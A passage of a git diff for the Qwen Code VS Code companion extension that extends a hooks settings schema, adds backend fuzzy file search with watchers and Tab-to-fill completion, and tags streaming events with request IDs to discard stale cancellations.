{ + "description": "Environment variables to set when executing the hook command.", + "type": "object", + "additionalProperties": { + "type": "string" + } + } + }, + "required": [ + "type", + "command" + ] + } + } + }, + "required": [ + "hooks" + ] } }, "Stop": { "description": "Hooks that execute after agent processing. 
Can post-process responses or log interactions.", "type": "array", + "items": { + "description": "A hook definition with an optional matcher and a list of hook configurations.", + "type": "object", + "properties": { + "matcher": { + "description": "An optional matcher pattern to filter when this hook definition applies.", + "type": "string" + }, + "sequential": { + "description": "Whether the hooks should be executed sequentially instead of in parallel.", + "type": "boolean" + }, + "hooks": { + "description": "The list of hook configurations to execute.", + "type": "array", + "items": { + "description": "A hook configuration entry that defines a command to execute.", + "type": "object", + "properties": { + "type": { + "description": "The type of hook.", + "type": "string", + "enum": [ + "command" + ] + }, + "command": { + "description": "The command to execute when the hook is triggered.", + "type": "string" + }, + "name": { + "description": "An optional name for the hook.", + "type": "string" + }, + "description": { + "description": "An optional description of what the hook does.", + "type": "string" + }, + "timeout": { + "description": "Timeout in milliseconds for the hook execution.", + "type": "number" + }, + "env": { + "description": "Environment variables to set when executing the hook command.", + "type": "object", + "additionalProperties": { + "type": "string" + } + } + }, + "required": [ + "type", + "command" + ] + } + } + }, + "required": [ + "hooks" + ] + } + }, + "Notification": { + "description": "Hooks that execute when notifications are sent.", + "type": "array", + "items": { + "type": "string" + } + }, + "PreToolUse": { + "description": "Hooks that execute before tool execution.", + "type": "array", + "items": { + "type": "string" + } + }, + "PostToolUse": { + "description": "Hooks that execute after successful tool execution.", + "type": "array", + "items": { + "type": "string" + } + }, + "PostToolUseFailure": { + "description": "Hooks that execute 
when tool execution fails. ", + "type": "array", + "items": { + "type": "string" + } + }, + "SessionStart": { + "description": "Hooks that execute when a new session starts or resumes.", + "type": "array", + "items": { + "type": "string" + } + }, + "SessionEnd": { + "description": "Hooks that execute when a session ends.", + "type": "array", + "items": { + "type": "string" + } + }, + "PreCompact": { + "description": "Hooks that execute before conversation compaction.", + "type": "array", + "items": { + "type": "string" + } + }, + "SubagentStart": { + "description": "Hooks that execute when a subagent (Task tool call) is started.", + "type": "array", + "items": { + "type": "string" + } + }, + "SubagentStop": { + "description": "Hooks that execute right before a subagent (Task tool call) concludes its response.", + "type": "array", + "items": { + "type": "string" + } + }, + "PermissionRequest": { + "description": "Hooks that execute when a permission dialog is displayed.", + "type": "array", "items": { "type": "string" } } } }, + "experimental": { + "description": "Setting to enable experimental features", + "type": "object", + "properties": {} + }, "$version": { "type": "number", "description": "Settings schema version for migration tracking.", diff --git a/packages/vscode-ide-companion/src/diff-manager.ts b/packages/vscode-ide-companion/src/diff-manager.ts index 9a32769c1..8367517ab 100644 --- a/packages/vscode-ide-companion/src/diff-manager.ts +++ b/packages/vscode-ide-companion/src/diff-manager.ts @@ -192,17 +192,17 @@ export class DiffManager { return; } // Left side: old content using qwen-diff scheme - const leftDocUri = vscode.Uri.from({ + // Use Uri.file() to properly handle Windows paths (e.g., C:\Users\...) 
+ // then change the scheme to our custom diff scheme + const leftDocUri = vscode.Uri.file(normalizedPath).with({ scheme: DIFF_SCHEME, - path: normalizedPath, query: `old&rand=${Math.random()}`, }); this.diffContentProvider.setContent(leftDocUri, oldContent); // Right side: new content using qwen-diff scheme - const rightDocUri = vscode.Uri.from({ + const rightDocUri = vscode.Uri.file(normalizedPath).with({ scheme: DIFF_SCHEME, - path: normalizedPath, query: `new&rand=${Math.random()}`, }); this.diffContentProvider.setContent(rightDocUri, newContent); diff --git a/packages/vscode-ide-companion/src/webview/App.tsx b/packages/vscode-ide-companion/src/webview/App.tsx index 56b81d98c..c569c1557 100644 --- a/packages/vscode-ide-companion/src/webview/App.tsx +++ b/packages/vscode-ide-companion/src/webview/App.tsx @@ -134,18 +134,11 @@ export const App: React.FC = () => { }), ); - if (query && query.length >= 1) { - const lowerQuery = query.toLowerCase(); - return allItems.filter( - (item) => - item.label.toLowerCase().includes(lowerQuery) || - (item.description && - item.description.toLowerCase().includes(lowerQuery)), - ); - } + // Fuzzy search is handled by the backend (FileSearchFactory) + // No client-side filtering needed - results are already fuzzy-matched // If first time and still loading, show a placeholder - if (allItems.length === 0) { + if (allItems.length === 0 && query && query.length >= 1) { return [ { id: 'loading-files', @@ -189,6 +182,7 @@ export const App: React.FC = () => { description: cmd.description, type: 'command' as const, group: 'Slash Commands', + value: cmd.name, }), ); @@ -307,22 +301,24 @@ export const App: React.FC = () => { // Emit a cancel to the extension and immediately reflect interruption locally. 
const handleCancel = useCallback(() => { if (messageHandling.isStreaming || messageHandling.isWaitingForResponse) { - // Proactively end local states and add an 'Interrupted' line - try { - messageHandling.endStreaming?.(); - } catch { - /* no-op */ + // End streaming state and add an 'Interrupted' line. + // IMPORTANT: Do NOT clear isWaitingForResponse here — let the + // extension's streamEnd message clear it after the cancel is + // properly processed on the backend. This keeps the submit + // guard active and prevents any cached input from being + // auto-submitted during the cancel → confirmed window. + if (messageHandling.isStreaming) { + try { + messageHandling.endStreaming?.(); + } catch { + /* no-op */ + } + messageHandling.addMessage({ + role: 'assistant', + content: 'Interrupted', + timestamp: Date.now(), + }); } - try { - messageHandling.clearWaitingForResponse?.(); - } catch { - /* no-op */ - } - messageHandling.addMessage({ - role: 'assistant', - content: 'Interrupted', - timestamp: Date.now(), - }); } // Notify extension/agent to cancel server-side work vscode.postMessage({ @@ -516,9 +512,11 @@ export const App: React.FC = () => { setAskUserQuestionRequest(null); }, [vscode]); - // Handle completion selection + // Handle completion selection. + // When fillOnly is true (Tab), slash commands are inserted into the input + // instead of being sent immediately, so users can append arguments. 
const handleCompletionSelect = useCallback( - (item: CompletionItem) => { + (item: CompletionItem, fillOnly?: boolean) => { // Handle completion selection by inserting the value into the input field const inputElement = inputFieldRef.current; if (!inputElement) { @@ -591,13 +589,13 @@ export const App: React.FC = () => { } }; - // Handle special commands by id if (itemId === 'login') { clearTriggerText(); vscode.postMessage({ type: 'login', data: {} }); completion.closeCompletion(); return; } + if (itemId === 'model') { clearTriggerText(); setShowModelSelector(true); @@ -605,10 +603,11 @@ export const App: React.FC = () => { return; } - // Handle server-provided slash commands by sending them as messages - // CLI will detect slash commands in session/prompt and execute them + // Handle server-provided slash commands by sending them as messages. + // Skip when fillOnly (Tab) — let the generic insertion path fill the + // command text so the user can keep typing arguments. const serverCmd = availableCommands.find((c) => c.name === itemId); - if (serverCmd) { + if (serverCmd && !fillOnly) { // Clear the trigger text since we're sending the command clearTriggerText(); // Send the slash command as a user message @@ -676,7 +675,9 @@ export const App: React.FC = () => { // Replace from trigger to cursor with selected value const textBeforeCursor = text.substring(0, cursorPos); const atPos = textBeforeCursor.lastIndexOf('@'); - const slashPos = textBeforeCursor.lastIndexOf('/'); + // Only consider slash as trigger if we're in slash command mode + const slashPos = + completion.triggerChar === '/' ? 
textBeforeCursor.lastIndexOf('/') : -1; const triggerPos = Math.max(atPos, slashPos); if (triggerPos >= 0) { @@ -1029,6 +1030,7 @@ export const App: React.FC = () => { completionIsOpen={completion.isOpen} completionItems={completion.items} onCompletionSelect={handleCompletionSelect} + onCompletionFill={(item) => handleCompletionSelect(item, true)} onCompletionClose={completion.closeCompletion} showModelSelector={showModelSelector} availableModels={availableModels} diff --git a/packages/vscode-ide-companion/src/webview/components/layout/InputForm.test.tsx b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.test.tsx new file mode 100644 index 000000000..8bf5ea26f --- /dev/null +++ b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.test.tsx @@ -0,0 +1,155 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** @vitest-environment jsdom */ + +import type React from 'react'; +import { act, createRef } from 'react'; +import { afterEach, beforeEach, describe, expect, it, vi } from 'vitest'; +import { createRoot, type Root } from 'react-dom/client'; +import { ApprovalMode } from '../../../types/acpTypes.js'; +import type { CompletionItem } from '../../../types/completionItemTypes.js'; +import { InputForm } from './InputForm.js'; + +vi.mock('@qwen-code/webui', async () => { + const actual = await vi.importActual( + '../../../../../webui/src/components/layout/InputForm.tsx', + ); + + return { + InputForm: actual.InputForm, + getEditModeIcon: actual.getEditModeIcon, + }; +}); + +const completionItem: CompletionItem = { + id: 'create-issue', + label: '/create-issue', + type: 'command', + value: 'create-issue', +}; + +function renderInputForm(props?: { + onCompletionSelect?: (item: CompletionItem) => void; + onCompletionFill?: (item: CompletionItem) => void; +}) { + const container = document.createElement('div'); + document.body.appendChild(container); + + const root = createRoot(container); 
+ const inputFieldRef = + createRef() as unknown as React.RefObject; + const onCompletionSelect = props?.onCompletionSelect ?? vi.fn(); + const onCompletionFill = props?.onCompletionFill ?? vi.fn(); + + act(() => { + root.render( + , + ); + }); + + return { + container, + root, + onCompletionSelect, + onCompletionFill, + }; +} + +describe('InputForm completion keyboard handling', () => { + let root: Root | null = null; + let container: HTMLDivElement | null = null; + + beforeEach(() => { + vi.clearAllMocks(); + ( + globalThis as typeof globalThis & { IS_REACT_ACT_ENVIRONMENT?: boolean } + ).IS_REACT_ACT_ENVIRONMENT = true; + Object.defineProperty(HTMLElement.prototype, 'scrollIntoView', { + configurable: true, + value: vi.fn(), + }); + }); + + afterEach(() => { + if (root) { + act(() => { + root?.unmount(); + }); + root = null; + } + if (container) { + container.remove(); + container = null; + } + }); + + it('uses onCompletionFill for Tab without triggering onCompletionSelect', () => { + const rendered = renderInputForm(); + root = rendered.root; + container = rendered.container; + + act(() => { + document.dispatchEvent( + new KeyboardEvent('keydown', { + key: 'Tab', + bubbles: true, + cancelable: true, + }), + ); + }); + + expect(rendered.onCompletionFill).toHaveBeenCalledWith(completionItem); + expect(rendered.onCompletionSelect).not.toHaveBeenCalled(); + }); + + it('keeps Enter mapped to onCompletionSelect', () => { + const rendered = renderInputForm(); + root = rendered.root; + container = rendered.container; + + act(() => { + document.dispatchEvent( + new KeyboardEvent('keydown', { + key: 'Enter', + bubbles: true, + cancelable: true, + }), + ); + }); + + expect(rendered.onCompletionSelect).toHaveBeenCalledWith(completionItem); + expect(rendered.onCompletionFill).not.toHaveBeenCalled(); + }); +}); diff --git a/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx 
index cb747aff3..809f80dbc 100644 --- a/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx +++ b/packages/vscode-ide-companion/src/webview/components/layout/InputForm.tsx @@ -13,6 +13,7 @@ import type { InputFormProps as BaseInputFormProps, EditModeInfo, } from '@qwen-code/webui'; +import type { CompletionItem } from '../../../types/completionItemTypes.js'; import { getApprovalModeInfoFromString } from '../../../types/acpTypes.js'; import type { ApprovalModeValue } from '../../../types/approvalModeValueTypes.js'; import type { ModelInfo } from '@agentclientprotocol/sdk'; @@ -22,9 +23,11 @@ import { ModelSelector } from './ModelSelector.js'; * Extended props that accept ApprovalModeValue and ModelSelector */ export interface InputFormProps - extends Omit { + extends Omit { /** Edit mode value (local type) */ editMode: ApprovalModeValue; + /** Completion fill callback (Tab or equivalent) */ + onCompletionFill?: (item: CompletionItem) => void; /** Whether to show model selector */ showModelSelector?: boolean; /** Available models for selection */ diff --git a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts index 8cccae79e..d6ff4c4a9 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts +++ b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.test.ts @@ -11,6 +11,11 @@ import { FileMessageHandler } from './FileMessageHandler.js'; import * as vscode from 'vscode'; const shouldIgnoreFileMock = vi.hoisted(() => vi.fn()); +const fileSearchMock = vi.hoisted(() => ({ + initialize: vi.fn(), + search: vi.fn(), +})); + const vscodeMock = vi.hoisted(() => { class Uri { fsPath: string; @@ -20,6 +25,9 @@ const vscodeMock = vi.hoisted(() => { static file(fsPath: string) { return new Uri(fsPath); } + static joinPath(base: Uri, ...pathSegments: string[]) { + return new 
Uri(`${base.fsPath}/${pathSegments.join('/')}`); + } } return { @@ -28,7 +36,14 @@ const vscodeMock = vi.hoisted(() => { findFiles: vi.fn(), getWorkspaceFolder: vi.fn(), asRelativePath: vi.fn(), - workspaceFolders: [], + workspaceFolders: [] as vscode.WorkspaceFolder[], + createFileSystemWatcher: vi.fn(() => ({ + onDidCreate: vi.fn(), + onDidDelete: vi.fn(), + onDidChange: vi.fn(), + dispose: vi.fn(), + })), + onDidChangeWorkspaceFolders: vi.fn(() => ({ dispose: vi.fn() })), }, window: { activeTextEditor: undefined, @@ -50,13 +65,67 @@ vi.mock( }, }), ); +vi.mock('@qwen-code/qwen-code-core/src/utils/filesearch/fileSearch.js', () => ({ + FileSearchFactory: { + create: () => fileSearchMock, + }, +})); +vi.mock('@qwen-code/qwen-code-core/src/utils/filesearch/crawlCache.js', () => ({ + clear: vi.fn(), +})); describe('FileMessageHandler', () => { beforeEach(() => { vi.clearAllMocks(); }); - it('filters ignored paths and includes request metadata in workspace files', async () => { + it('searches files using fuzzy search when query is provided', async () => { + const rootPath = '/workspace'; + + vscodeMock.workspace.workspaceFolders = [ + { uri: vscode.Uri.file(rootPath), name: 'workspace', index: 0 }, + ]; + + fileSearchMock.initialize.mockResolvedValue(undefined); + fileSearchMock.search.mockResolvedValue([ + 'src/test.txt', + 'docs/readme.txt', + ]); + + const sendToWebView = vi.fn(); + const handler = new FileMessageHandler( + {} as QwenAgentManager, + {} as ConversationStore, + null, + sendToWebView, + ); + + await handler.handle({ + type: 'getWorkspaceFiles', + data: { query: 'txt', requestId: 7 }, + }); + + expect(fileSearchMock.search).toHaveBeenCalledWith('txt', { + maxResults: 50, + }); + + expect(sendToWebView).toHaveBeenCalledTimes(1); + const payload = sendToWebView.mock.calls[0]?.[0] as { + type: string; + data: { + files: Array<{ path: string }>; + query?: string; + requestId?: number; + }; + }; + + expect(payload.type).toBe('workspaceFiles'); + 
expect(payload.data.requestId).toBe(7); + expect(payload.data.query).toBe('txt'); + expect(payload.data.files).toHaveLength(2); + }); + + it('filters ignored paths in non-query mode', async () => { const rootPath = '/workspace'; const allowedPath = `${rootPath}/allowed.txt`; const ignoredPath = `${rootPath}/ignored.log`; @@ -64,6 +133,7 @@ describe('FileMessageHandler', () => { const allowedUri = vscode.Uri.file(allowedPath); const ignoredUri = vscode.Uri.file(ignoredPath); + vscodeMock.workspace.workspaceFolders = []; vscodeMock.workspace.findFiles.mockResolvedValue([allowedUri, ignoredUri]); vscodeMock.workspace.getWorkspaceFolder.mockImplementation(() => ({ uri: vscode.Uri.file(rootPath), @@ -86,21 +156,22 @@ describe('FileMessageHandler', () => { await handler.handle({ type: 'getWorkspaceFiles', - data: { query: 'txt', requestId: 7 }, + data: { requestId: 7 }, }); expect(vscodeMock.workspace.findFiles).toHaveBeenCalledWith( - '**/*[tT][xX][tT]*', + '**/*', '**/{.git,node_modules}/**', - 50, + 20, ); expect(shouldIgnoreFileMock).toHaveBeenCalledWith(ignoredPath, { respectGitIgnore: true, respectQwenIgnore: false, }); - expect(sendToWebView).toHaveBeenCalledTimes(1); - const payload = sendToWebView.mock.calls[0]?.[0] as { + const payload = sendToWebView.mock.calls[ + sendToWebView.mock.calls.length - 1 + ]?.[0] as { type: string; data: { files: Array<{ path: string }>; @@ -111,8 +182,5 @@ describe('FileMessageHandler', () => { expect(payload.type).toBe('workspaceFiles'); expect(payload.data.requestId).toBe(7); - expect(payload.data.query).toBe('txt'); - expect(payload.data.files).toHaveLength(1); - expect(payload.data.files[0]?.path).toBe(allowedPath); }); }); diff --git a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts index 4e6e43575..f8708d8d4 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts +++ 
b/packages/vscode-ide-companion/src/webview/handlers/FileMessageHandler.ts @@ -14,6 +14,11 @@ import { } from '../../utils/editorGroupUtils.js'; import { ReadonlyFileSystemProvider } from '../../services/readonlyFileSystemProvider.js'; import { FileDiscoveryService } from '@qwen-code/qwen-code-core/src/services/fileDiscoveryService.js'; +import { + FileSearchFactory, + type FileSearch, +} from '@qwen-code/qwen-code-core/src/utils/filesearch/fileSearch.js'; +import * as crawlCache from '@qwen-code/qwen-code-core/src/utils/filesearch/crawlCache.js'; import { getErrorMessage } from '../../utils/errorMessage.js'; /** @@ -25,6 +30,9 @@ export class FileMessageHandler extends BaseMessageHandler { string, FileDiscoveryService >(); + private readonly fileSearchInstances = new Map(); + private readonly fileSearchInitializing = new Map>(); + private readonly fileWatchers = new Map(); private readonly globSpecialChars = new Set([ '\\', '*', @@ -51,6 +59,122 @@ export class FileMessageHandler extends BaseMessageHandler { ].includes(messageType); } + private async getOrCreateFileSearch( + rootPath: string, + ): Promise { + const existing = this.fileSearchInstances.get(rootPath); + if (existing) { + return existing; + } + + const initializing = this.fileSearchInitializing.get(rootPath); + if (initializing) { + await initializing; + return this.fileSearchInstances.get(rootPath) ?? null; + } + + const initPromise = (async () => { + const search = FileSearchFactory.create({ + projectRoot: rootPath, + ignoreDirs: ['.git', 'node_modules'], + useGitignore: true, + useQwenignore: false, + cache: true, + cacheTtl: 30000, + enableRecursiveFileSearch: true, + enableFuzzySearch: true, + }); + await search.initialize(); + this.fileSearchInstances.set(rootPath, search); + })(); + + this.fileSearchInitializing.set(rootPath, initPromise); + + try { + await initPromise; + return this.fileSearchInstances.get(rootPath) ?? 
null; + } catch (error) { + this.fileSearchInitializing.delete(rootPath); + console.error( + '[FileMessageHandler] Failed to initialize file search:', + error, + ); + return null; + } + } + + private clearFileSearchCache(rootPath: string): void { + this.fileSearchInstances.delete(rootPath); + this.fileSearchInitializing.delete(rootPath); + crawlCache.clear(); + console.log( + '[FileMessageHandler] Cleared file search cache, trigger:', + rootPath, + ); + } + + private createWatcherForFolder(folder: vscode.WorkspaceFolder): void { + const rootPath = folder.uri.fsPath; + + // Skip if watcher already exists for this folder + if (this.fileWatchers.has(rootPath)) { + return; + } + + const watcher = vscode.workspace.createFileSystemWatcher( + new vscode.RelativePattern(folder, '**/*'), + ); + + const onFileAddOrDelete = () => this.clearFileSearchCache(rootPath); + watcher.onDidCreate(onFileAddOrDelete); + watcher.onDidDelete(onFileAddOrDelete); + // Note: onDidChange is not needed - file search is based on names, not content + + this.fileWatchers.set(rootPath, watcher); + } + + private disposeWatcherForFolder(rootPath: string): void { + const watcher = this.fileWatchers.get(rootPath); + if (watcher) { + watcher.dispose(); + this.fileWatchers.delete(rootPath); + } + } + + setupFileWatchers(): vscode.Disposable { + const workspaceFolders = vscode.workspace.workspaceFolders; + if (workspaceFolders) { + for (const folder of workspaceFolders) { + this.createWatcherForFolder(folder); + } + } + + const foldersChangeListener = vscode.workspace.onDidChangeWorkspaceFolders( + (e) => { + for (const folder of e.removed) { + const rootPath = folder.uri.fsPath; + this.clearFileSearchCache(rootPath); + this.disposeWatcherForFolder(rootPath); + } + for (const folder of e.added) { + const rootPath = folder.uri.fsPath; + this.clearFileSearchCache(rootPath); + this.createWatcherForFolder(folder); + } + }, + ); + + return { + dispose: () => { + for (const watcher of 
this.fileWatchers.values()) { + watcher.dispose(); + } + this.fileWatchers.clear(); + foldersChangeListener.dispose(); + }, + }; + } + async handle(message: { type: string; data?: unknown }): Promise { const data = message.data as Record | undefined; @@ -282,20 +406,43 @@ export class FileMessageHandler extends BaseMessageHandler { // Search or show recent files if (query) { - const includePattern = `**/*${this.buildCaseInsensitiveGlob(query)}*`; - // Query mode: perform filesystem search (may take longer on large workspaces) console.log( - '[FileMessageHandler] Searching workspace files for query', + '[FileMessageHandler] Searching workspace files with fuzzy search for query', query, ); - const uris = await vscode.workspace.findFiles( - includePattern, - '**/{.git,node_modules}/**', - 50, - ); - for (const uri of uris) { - addFile(uri); + const workspaceFolders = vscode.workspace.workspaceFolders; + if (workspaceFolders) { + for (const folder of workspaceFolders) { + const rootPath = folder.uri.fsPath; + const fileSearch = await this.getOrCreateFileSearch(rootPath); + if (!fileSearch) { + continue; + } + + const relativePaths = await fileSearch.search(query, { + maxResults: 50, + }); + + for (let relativePath of relativePaths) { + const isDirectory = relativePath.endsWith('/'); + if (isDirectory) { + relativePath = relativePath.slice(0, -1); + } + const absolutePath = vscode.Uri.joinPath( + folder.uri, + relativePath, + ).fsPath; + + files.push({ + id: absolutePath, + label: relativePath, + description: relativePath, + path: absolutePath, + }); + addedPaths.add(absolutePath); + } + } } } else { // Non-query mode: respond quickly with currently active and open files diff --git a/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts b/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts index 9cb401b43..2f1b862cc 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts +++ 
b/packages/vscode-ide-companion/src/webview/handlers/MessageRouter.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import type * as vscode from 'vscode'; import type { IMessageHandler } from './BaseMessageHandler.js'; import type { QwenAgentManager } from '../../services/qwenAgentManager.js'; import type { ConversationStore } from '../../services/conversationStore.js'; @@ -24,6 +25,7 @@ export class MessageRouter { private handlers: IMessageHandler[] = []; private sessionHandler: SessionMessageHandler; private authHandler: AuthMessageHandler; + private fileHandler: FileMessageHandler; private currentConversationId: string | null = null; private permissionHandler: | ((message: PermissionResponseMessage) => void) @@ -48,7 +50,7 @@ export class MessageRouter { sendToWebView, ); - const fileHandler = new FileMessageHandler( + this.fileHandler = new FileMessageHandler( agentManager, conversationStore, currentConversationId, @@ -72,12 +74,16 @@ export class MessageRouter { // Register handlers in order of priority this.handlers = [ this.sessionHandler, - fileHandler, + this.fileHandler, editorHandler, this.authHandler, ]; } + setupFileWatchers(): vscode.Disposable { + return this.fileHandler.setupFileWatchers(); + } + /** * Route message to appropriate handler */ diff --git a/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts b/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts index 4afac9273..e03a0e28d 100644 --- a/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts +++ b/packages/vscode-ide-companion/src/webview/handlers/SessionMessageHandler.ts @@ -160,16 +160,49 @@ export class SessionMessageHandler extends BaseMessageHandler { } /** - * Notify the webview that streaming has finished. + * Monotonically increasing request counter used to tag streamStart/streamEnd + * so the WebView can detect and discard stale events from previous requests. 
*/ - private sendStreamEnd(reason?: string): void { - const data: { timestamp: number; reason?: string } = { + private requestCounter = 0; + private currentRequestId: string | null = null; + private streamEndSent = false; + + /** + * Notify the webview that streaming has finished. + * Includes the `requestId` so the webview can ignore stale events. + * Guarded by `streamEndSent` to prevent duplicate streamEnd for the + * same request (e.g. cancel handler + error handler both sending one). + * + * @param reason Optional reason string (e.g. 'user_cancelled'). + * @param forRequestId When provided, the call is scoped to a specific + * request invocation. If a newer request has since overwritten + * `this.currentRequestId`, the call is silently dropped — this + * prevents a stale `handleSendMessage` invocation (resumed after + * cancellation) from emitting a streamEnd tagged as the newer request. + */ + private sendStreamEnd(reason?: string, forRequestId?: string): void { + if (this.streamEndSent) { + return; + } + // If the caller captured a request ID, only proceed when it still + // matches the active request. A mismatch means a newer request has + // taken over the shared state; emitting now would incorrectly tag + // the event with the newer request's ID. + if (forRequestId && this.currentRequestId !== forRequestId) { + return; + } + this.streamEndSent = true; + + const data: { timestamp: number; reason?: string; requestId?: string } = { timestamp: Date.now(), }; if (reason) { data.reason = reason; } + if (this.currentRequestId) { + data.requestId = this.currentRequestId; + } this.sendToWebView({ type: 'streamEnd', @@ -388,12 +421,28 @@ export class SessionMessageHandler extends BaseMessageHandler { } // Send to agent + // + // Generate a unique requestId so the webview can correlate + // streamStart/streamEnd and discard stale events. 
+ this.requestCounter += 1; + this.currentRequestId = `req-${this.requestCounter}-${Date.now()}`; + this.streamEndSent = false; + + // Capture locally so that if a newer handleSendMessage() overwrites + // the shared fields while we are awaiting, our sendStreamEnd calls + // will detect the mismatch and silently no-op instead of emitting + // a streamEnd tagged with the newer request's ID. + const myRequestId = this.currentRequestId; + try { this.resetStreamContent(); this.sendToWebView({ type: 'streamStart', - data: { timestamp: Date.now() }, + data: { + timestamp: Date.now(), + requestId: myRequestId, + }, }); await this.agentManager.sendMessage(formattedText); @@ -411,7 +460,7 @@ export class SessionMessageHandler extends BaseMessageHandler { ); } - this.sendStreamEnd(); + this.sendStreamEnd(undefined, myRequestId); } catch (error) { console.error('[SessionMessageHandler] Error sending message:', error); @@ -433,7 +482,7 @@ export class SessionMessageHandler extends BaseMessageHandler { if (isAbortLike) { // Do not show VS Code error popup for intentional cancellations. // Ensure the webview knows the stream ended due to user action. - this.sendStreamEnd('user_cancelled'); + this.sendStreamEnd('user_cancelled', myRequestId); return; } // Check for session not found error and handle it appropriately @@ -451,7 +500,7 @@ export class SessionMessageHandler extends BaseMessageHandler { type: 'sessionExpired', data: { message: 'Session expired. Please login again.' 
}, }); - this.sendStreamEnd('session_expired'); + this.sendStreamEnd('session_expired', myRequestId); } else { const isTimeoutError = lower.includes('timeout') || lower.includes('timed out'); @@ -474,7 +523,7 @@ export class SessionMessageHandler extends BaseMessageHandler { type: 'message', data: timeoutMessage, }); - this.sendStreamEnd('timeout'); + this.sendStreamEnd('timeout', myRequestId); } else { // Handling of Non-Timeout Errors vscode.window.showErrorMessage(`Error sending message: ${errorMsg}`); @@ -482,7 +531,7 @@ export class SessionMessageHandler extends BaseMessageHandler { type: 'error', data: { message: errorMsg }, }); - this.sendStreamEnd('error'); + this.sendStreamEnd('error', myRequestId); } } } @@ -790,21 +839,15 @@ export class SessionMessageHandler extends BaseMessageHandler { // Cancel the current streaming operation in the agent manager await this.agentManager.cancelCurrentPrompt(); - // Send streamEnd message to WebView to update UI - this.sendToWebView({ - type: 'streamEnd', - data: { timestamp: Date.now(), reason: 'user_cancelled' }, - }); + // Use sendStreamEnd to include requestId for proper correlation + this.sendStreamEnd('user_cancelled'); console.log('[SessionMessageHandler] Streaming cancelled successfully'); } catch (_error) { console.log('[SessionMessageHandler] Streaming cancelled (interrupted)'); - // Always send streamEnd to update UI, regardless of errors - this.sendToWebView({ - type: 'streamEnd', - data: { timestamp: Date.now(), reason: 'user_cancelled' }, - }); + // Use sendStreamEnd (with duplicate guard) to include requestId + this.sendStreamEnd('user_cancelled'); } } diff --git a/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts b/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts index 0f5296550..50344ac0e 100644 --- a/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts +++ b/packages/vscode-ide-companion/src/webview/hooks/file/useFileContext.ts @@ -123,10 
+123,12 @@ export const useFileContext = (vscode: VSCodeAPI) => { ); /** - * Add file reference + * Add file reference (called when user selects a file from completion) + * Also resets the last query so that backspacing and re-typing will trigger a fresh search */ const addFileReference = useCallback((fileName: string, filePath: string) => { fileReferenceMap.current.set(fileName, filePath); + lastQueryRef.current = undefined; }, []); /** diff --git a/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts b/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts index f3a660366..6fad7cba5 100644 --- a/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts +++ b/packages/vscode-ide-companion/src/webview/hooks/useCompletionTrigger.ts @@ -305,10 +305,13 @@ export function useCompletionTrigger( let triggerPos = -1; let triggerChar: '@' | '/' | null = null; - if (lastAtMatch > lastSlashMatch) { + // Priority: @ trigger takes precedence over / trigger + // This allows path-like queries (e.g., "src/components/Button") in @ mentions + // But skip if the trigger is inside a file tag + if (lastAtMatch >= 0) { triggerPos = lastAtMatch; triggerChar = '@'; - } else if (lastSlashMatch > lastAtMatch) { + } else if (lastSlashMatch >= 0) { triggerPos = lastSlashMatch; triggerChar = '/'; } diff --git a/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts b/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts index 4400c54b4..52d1655e7 100644 --- a/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts +++ b/packages/vscode-ide-companion/src/webview/hooks/useWebViewMessages.ts @@ -168,6 +168,9 @@ export const useWebViewMessages = ({ // keep the bottom "waiting" message visible until all of them complete. 
const activeExecToolCallsRef = useRef>(new Set()); const modelInfoRef = useRef(null); + // Track the active requestId from the latest streamStart so we can + // discard stale streamEnd events from cancelled/previous requests. + const activeRequestIdRef = useRef(null); // Use ref to store callbacks to avoid useEffect dependency issues const handlersRef = useRef({ sessionManagement, @@ -461,11 +464,15 @@ export const useWebViewMessages = ({ break; } - case 'streamStart': - handlers.messageHandling.startStreaming( - (message.data as { timestamp?: number } | undefined)?.timestamp, - ); + case 'streamStart': { + const startData = message.data as + | { timestamp?: number; requestId?: string } + | undefined; + // Store the requestId so we can validate streamEnd events + activeRequestIdRef.current = startData?.requestId ?? null; + handlers.messageHandling.startStreaming(startData?.timestamp); break; + } case 'streamChunk': { handlers.messageHandling.appendStreamChunk(message.data.chunk); @@ -479,6 +486,24 @@ export const useWebViewMessages = ({ } case 'streamEnd': { + const endData = message.data as + | { reason?: string; requestId?: string } + | undefined; + const endRequestId = endData?.requestId ?? null; + + // Drop stale or untagged streamEnd when a tagged stream is active. + if (activeRequestIdRef.current) { + if (endRequestId !== activeRequestIdRef.current) { + console.log( + '[useWebViewMessages] Ignoring stale/untagged streamEnd:', + endRequestId, + 'active:', + activeRequestIdRef.current, + ); + break; + } + } + // Always end local streaming state and clear thinking state handlers.messageHandling.endStreaming(); handlers.messageHandling.clearThinking(); @@ -488,9 +513,7 @@ export const useWebViewMessages = ({ // This avoids UI getting stuck with Stop button visible after // rejecting a permission request. 
